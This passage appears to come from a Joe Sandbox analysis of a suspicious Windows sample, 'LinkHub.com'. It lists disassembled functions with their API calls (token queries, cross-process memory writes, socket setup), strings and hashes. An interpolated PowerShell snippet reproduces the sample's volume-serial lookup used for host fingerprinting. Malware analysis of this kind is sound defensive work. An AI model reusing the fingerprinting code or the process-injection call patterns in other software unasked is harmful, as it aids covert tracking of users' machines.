                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 842720411-0
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00261916
                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00261922
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00261931
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00261938
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0026194E
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00261976
                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00261982
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00261991
                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00261998
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002619AE
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00270B24,?,00273D41,?,00000001,00243AF4,?), ref: 00270CCB
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00270B24,?,00273D41,?,00000001,00243AF4,?), ref: 00270CD8
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00270B24,?,00273D41,?,00000001,00243AF4,?), ref: 00270CE5
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00270B24,?,00273D41,?,00000001,00243AF4,?), ref: 00270CF2
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00270B24,?,00273D41,?,00000001,00243AF4,?), ref: 00270CFF
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00270B24,?,00273D41,?,00000001,00243AF4,?), ref: 00270D0C
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 002665BF
                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 002665D6
                                                                                        • MessageBeep.USER32(00000000), ref: 002665EE
                                                                                        • KillTimer.USER32(?,0000040A), ref: 0026660A
                                                                                        • EndDialog.USER32(?,00000001), ref: 00266624
                                                                                        Similarity
                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3741023627-0
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 0023DAD2
                                                                                          • Part of subcall function 00232D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0023DB51,?,00000000,?,00000000,?,0023DB78,?,00000007,?,?,0023DF75,?), ref: 00232D4E
                                                                                          • Part of subcall function 00232D38: GetLastError.KERNEL32(?,?,0023DB51,?,00000000,?,00000000,?,0023DB78,?,00000007,?,?,0023DF75,?,?), ref: 00232D60
                                                                                        • _free.LIBCMT ref: 0023DAE4
                                                                                        • _free.LIBCMT ref: 0023DAF6
                                                                                        • _free.LIBCMT ref: 0023DB08
                                                                                        • _free.LIBCMT ref: 0023DB1A
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 0023262E
                                                                                          • Part of subcall function 00232D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0023DB51,?,00000000,?,00000000,?,0023DB78,?,00000007,?,?,0023DF75,?), ref: 00232D4E
                                                                                          • Part of subcall function 00232D38: GetLastError.KERNEL32(?,?,0023DB51,?,00000000,?,00000000,?,0023DB78,?,00000007,?,?,0023DF75,?,?), ref: 00232D60
                                                                                        • _free.LIBCMT ref: 00232640
                                                                                        • _free.LIBCMT ref: 00232653
                                                                                        • _free.LIBCMT ref: 00232664
                                                                                        • _free.LIBCMT ref: 00232675
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: __freea$_free
                                                                                        • String ID: a/p$am/pm
                                                                                        • API String ID: 3432400110-3206640213
                                                                                        APIs
                                                                                          • Part of subcall function 002741FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,002852EE,?,?,00000035,?), ref: 00274229
                                                                                          • Part of subcall function 002741FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,002852EE,?,?,00000035,?), ref: 00274239
                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00285419
                                                                                        • VariantInit.OLEAUT32(?), ref: 0028550E
                                                                                        • VariantClear.OLEAUT32(?), ref: 002855CD
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                        • String ID: bn&
                                                                                        • API String ID: 2854431205-2640381320
                                                                                        APIs
                                                                                        • __Init_thread_footer.LIBCMT ref: 0020D253
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Init_thread_footer
                                                                                        • String ID: t5-$t5-$t5-
                                                                                        • API String ID: 1385522511-1268989708
                                                                                        • Opcode ID: 532b2ff50eb963892d8e927f27d925b3e92d379590b09b4fcb3c5faceaaada56
                                                                                        • Instruction ID: 26c882f7bb4a4763db9cbd5a881b89ebf9d4376c40650a3c1ce81feefac5a79d
                                                                                        • Opcode Fuzzy Hash: 532b2ff50eb963892d8e927f27d925b3e92d379590b09b4fcb3c5faceaaada56
                                                                                        • Instruction Fuzzy Hash: E6915BB5A21306DFCB14CF98D4806A9B7F2FF58300F60815AD84997382D771ADA2CF90
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                         • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper_wcslen
                                                                                        • String ID: CALLARGARRAY$bn&
                                                                                        • API String ID: 157775604-4124307206
                                                                                        • Opcode ID: 8fc33cabd96a9ce7fc2bed71b5e2dac890a73561788e2274847ee9e84298bcf4
                                                                                        • Instruction ID: 06a7280c26141b9190cdbcb75913f54fec73c0d090314740592f43cbd4439787
                                                                                        • Opcode Fuzzy Hash: 8fc33cabd96a9ce7fc2bed71b5e2dac890a73561788e2274847ee9e84298bcf4
                                                                                        • Instruction Fuzzy Hash: 7641D475E21219DFCB00EFA4C8899EEBBB5FF58324F10415AE805A7291D7719DA1CF90
                                                                                        APIs
                                                                                          • Part of subcall function 0026BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00262B1D,?,?,00000034,00000800,?,00000034), ref: 0026BDF4
                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002630AD
                                                                                          • Part of subcall function 0026BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00262B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0026BDBF
                                                                                          • Part of subcall function 0026BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0026BD1C
                                                                                          • Part of subcall function 0026BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00262AE1,00000034,?,?,00001004,00000000,00000000), ref: 0026BD2C
                                                                                          • Part of subcall function 0026BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00262AE1,00000034,?,?,00001004,00000000,00000000), ref: 0026BD42
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0026311A
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00263167
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                         • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                        • String ID: @
                                                                                        • API String ID: 4150878124-2766056989
                                                                                        • Opcode ID: e84b671af0fcc8afdf652e1ca857d6438cdbf49cc32ac637ae5a9700e0c81175
                                                                                        • Instruction ID: 2de510a00e85946e23205e3f9982b435c185b90d8360a5cbfb461f30e211386e
                                                                                        • Opcode Fuzzy Hash: e84b671af0fcc8afdf652e1ca857d6438cdbf49cc32ac637ae5a9700e0c81175
                                                                                        • Instruction Fuzzy Hash: 27411972900218AEDB11DFA4CD85ADEBBB8EF49700F004095FA45BB181DB706F95CF60
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com,00000104), ref: 00231AD9
                                                                                        • _free.LIBCMT ref: 00231BA4
                                                                                        • _free.LIBCMT ref: 00231BAE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                         • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$FileModuleName
                                                                                        • String ID: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
                                                                                        • API String ID: 2506810119-1604394757
                                                                                        • Opcode ID: ac6c491e2d19e60da15b5ba9112dc1446d7705d1a95d65bdfa0c5ac153a2b5a1
                                                                                        • Instruction ID: cafdc37737852fa15dad3289c9142bcd0564703b17de233bb8464fe9a877888a
                                                                                        • Opcode Fuzzy Hash: ac6c491e2d19e60da15b5ba9112dc1446d7705d1a95d65bdfa0c5ac153a2b5a1
                                                                                        • Instruction Fuzzy Hash: 11318FB1E21219EBCB21DF99DC85D9EBBBDEF84714F1040A6F80497251E7B08E64CB90
                                                                                        APIs
                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0026CBB1
                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 0026CBF7
                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002D29C0,00AC6728), ref: 0026CC40
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                         • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$InfoItem
                                                                                        • String ID: 0
                                                                                        • API String ID: 135850232-4108050209
                                                                                        • Opcode ID: 294b014e845aa863d6ab3f4ca0932ff1210ae43f11c88b080b4907b28256ff37
                                                                                        • Instruction ID: 589853665acbb48086624bd97706c67302f0bac4eaa837356f9adaccdab2ad89
                                                                                        • Opcode Fuzzy Hash: 294b014e845aa863d6ab3f4ca0932ff1210ae43f11c88b080b4907b28256ff37
                                                                                        • Instruction Fuzzy Hash: DA41B2312143029FDB20EF24D885B2ABBE8EF84714F244A1EF4A9972D1D734E994CB52
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0029DCD0,00000000,?,?,?,?), ref: 00294F48
                                                                                        • GetWindowLongW.USER32 ref: 00294F65
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00294F75
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                         • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long
                                                                                        • String ID: SysTreeView32
                                                                                        • API String ID: 847901565-1698111956
                                                                                        • Opcode ID: 260a774cc3a5936fc25d1f225aacb9b19b8693e3dacfb30b35479f08a658f699
                                                                                        • Instruction ID: f770034fa8fb98cc69002624a9f920dc2c48f83570e07e9b5ad8ca24e8d8e582
                                                                                        • Opcode Fuzzy Hash: 260a774cc3a5936fc25d1f225aacb9b19b8693e3dacfb30b35479f08a658f699
                                                                                        • Instruction Fuzzy Hash: A5319C31224206AFDF219E78DC45FEA77A9EF09324F204715F979A21E0D770AC619B50
                                                                                        APIs
                                                                                          • Part of subcall function 00283DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00283AD4,?,?), ref: 00283DD5
                                                                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00283AD7
                                                                                        • _wcslen.LIBCMT ref: 00283AF8
                                                                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 00283B63
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                         • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                        • String ID: 255.255.255.255
                                                                                        • API String ID: 946324512-2422070025
                                                                                        • Opcode ID: dd5ff698d359784806e524c4206547508ac406b52dd03b2625e37ba6fe7962cd
                                                                                        • Instruction ID: 5ff70e9842975fdd5cf35e6d2b2debf581d02b8172c5a18f167e18d3ec11bd48
                                                                                        • Opcode Fuzzy Hash: dd5ff698d359784806e524c4206547508ac406b52dd03b2625e37ba6fe7962cd
                                                                                        • Instruction Fuzzy Hash: A231D3BD2112029FCB10EF68C5C5EA977E0EF14728F248159E8168B3D2D771EE55CB60
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002949DC
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002949F0
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00294A14
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                         • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: SysMonthCal32
                                                                                        • API String ID: 2326795674-1439706946
                                                                                        • Opcode ID: 13509f87fb11f374b2118300068bdf4a6a4a0d24b6d844ccede9f469c602cbc8
                                                                                        • Instruction ID: fae17412f3402bb8248d5be8800757d7d0533d40a66d3bf4cb8a34e061fcc4f8
                                                                                        • Opcode Fuzzy Hash: 13509f87fb11f374b2118300068bdf4a6a4a0d24b6d844ccede9f469c602cbc8
                                                                                        • Instruction Fuzzy Hash: B521BF32620219ABDF119F94DC46FEB3B69EF48718F110214FA15AB1D0D6B1AC62DB90
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002951A3
                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002951B1
                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002951B8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                         • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                        • String ID: msctls_updown32
                                                                                        • API String ID: 4014797782-2298589950
                                                                                        • Opcode ID: 250c9fe8fd1b71e0edaa35b3afc60a5b15461b90f502874e7503d8133db8034a
                                                                                        • Instruction ID: 180e5c1fd420664abc9c4d0d666e8724ab3add93de6e1441af8478ffa8b00ddb
                                                                                        • Opcode Fuzzy Hash: 250c9fe8fd1b71e0edaa35b3afc60a5b15461b90f502874e7503d8133db8034a
                                                                                        • Instruction Fuzzy Hash: 9121C1B5610619AFDB01CF28DC85EB737ADEF5A364B140149F9049B3A1CB30EC21DBA0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002942DC
                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002942EC
                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00294312
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                         • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$MoveWindow
                                                                                        • String ID: Listbox
                                                                                        • API String ID: 3315199576-2633736733
                                                                                        • Opcode ID: 1db0f4234e80e45c8a7e381933f92a8199c94d7f826dbdf2f3bf83f0622ee8d0
                                                                                        • Instruction ID: c3251dab32a5b0310ebd5ab5a0fe61b5c10ff963209e8fbcebb6259b8c594f81
                                                                                        • Opcode Fuzzy Hash: 1db0f4234e80e45c8a7e381933f92a8199c94d7f826dbdf2f3bf83f0622ee8d0
                                                                                        • Instruction Fuzzy Hash: 9621C532A20119BBDF119F94DC84FBB376EEF89754F118115F9009B190C671AC6297A0
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0027544D
                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002754A1
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,0029DCD0), ref: 00275515
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                        • String ID: %lu
                                                                                        • API String ID: 2507767853-685833217
                                                                                        • Opcode ID: 59d21223f813db8490ab6c6461e0f1d32e1d62965e5bdf0b9129e2e7e53dd31b
                                                                                        • Instruction ID: acc3dc166e4f0b8ee848ba3af95b976cf9465bc09cbb6cabbfc4c48a5acc74f9
                                                                                        • Opcode Fuzzy Hash: 59d21223f813db8490ab6c6461e0f1d32e1d62965e5bdf0b9129e2e7e53dd31b
                                                                                        • Instruction Fuzzy Hash: 34319371A10209AFDB10DF64C884EAAB7F8EF09304F1480A9F809DB262D771EE51DF61
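As an added illustration (not code from the sample and not part of the Joe Sandbox report), the PowerShell below reproduces the three-call sequence listed for this function via P/Invoke: SetErrorMode(SEM_FAILCRITICALERRORS = 1) silences the "There is no disk in the drive" dialog that GetVolumeInformationW would otherwise raise on an empty removable drive, the volume label and serial are then read (the 0x7FFF buffer size and the zeroed file-system arguments follow the listing), and the error mode is restored. Only the constants come from the listing; the root path, the helper name Get-VolumeSerial and the decimal rendering of the serial (matching the "%lu" string the report associates with this function) are assumptions.

```powershell
# Added example: replays SetErrorMode / GetVolumeInformationW / SetErrorMode as listed above.
# Not the sample's code; the helper name, root path and output fields are assumptions.
$sig = @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern uint SetErrorMode(uint uMode);

[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool GetVolumeInformationW(
    string lpRootPathName,
    System.Text.StringBuilder lpVolumeNameBuffer,
    uint nVolumeNameSize,
    out uint lpVolumeSerialNumber,
    IntPtr lpMaximumComponentLength,
    IntPtr lpFileSystemFlags,
    IntPtr lpFileSystemNameBuffer,
    uint nFileSystemNameSize);
'@
$k32 = Add-Type -MemberDefinition $sig -Name 'VolInfo' -Namespace 'Win32' -PassThru

function Get-VolumeSerial {
    param([string]$Root = 'C:\')   # root path is an assumption; the listing does not show it

    $SEM_FAILCRITICALERRORS = 1
    # SetErrorMode(1): suppress the "no disk in drive" dialog for the duration of the query
    $prev = $k32::SetErrorMode($SEM_FAILCRITICALERRORS)
    try {
        # 0x7FFF-character label buffer, serial out-param, remaining file-system args zeroed (as listed)
        $label  = New-Object System.Text.StringBuilder 0x7FFF
        [uint32]$serial = 0
        $ok = $k32::GetVolumeInformationW($Root, $label, 0x7FFF, [ref]$serial,
                                          [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, 0)
        if (-not $ok) { return $null }

        # "%lu": the serial rendered as an unsigned decimal, plus the usual hex form for comparison
        [pscustomobject]@{
            Root          = $Root
            Label         = $label.ToString()
            SerialDecimal = [string]$serial
            SerialHex     = ('{0:X8}' -f $serial)
        }
    }
    finally {
        # The sample restores with SetErrorMode(0); restoring the previous mode is the safer choice here
        $null = $k32::SetErrorMode($prev)
    }
}

Get-VolumeSerial 'C:\'
```

A volume serial number is commonly used as a host-identifying value, so a call chain like this is worth noting when triaging what an unknown binary collects about the machine it runs on.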
                                                                                        APIs
                                                                                        • GetActiveWindow.USER32 ref: 00298339
                                                                                        • EnumChildWindows.USER32(?,0029802F,00000000), ref: 002983B0
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ActiveChildEnumLongWindows
                                                                                        • String ID: (-$(-
                                                                                        • API String ID: 3814560230-1003087410
                                                                                        • Opcode ID: e58e494d755570a4c2d3393c815798c6a4d853b00f458fb3a673ea4923ce83e9
                                                                                        • Instruction ID: 86d1d5bdd986ba666f78b1010eb2161cc473420be193ce8db390f00e263898d3
                                                                                        • Opcode Fuzzy Hash: e58e494d755570a4c2d3393c815798c6a4d853b00f458fb3a673ea4923ce83e9
                                                                                        • Instruction Fuzzy Hash: DE216934211302DFCB208F28E854A96B7E5BF5A720F24065AF869873A0DB70AC25DB64
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00294CED
                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00294D02
                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00294D0F
                                                                                        Strings
                                                                                        Memory Dump Source
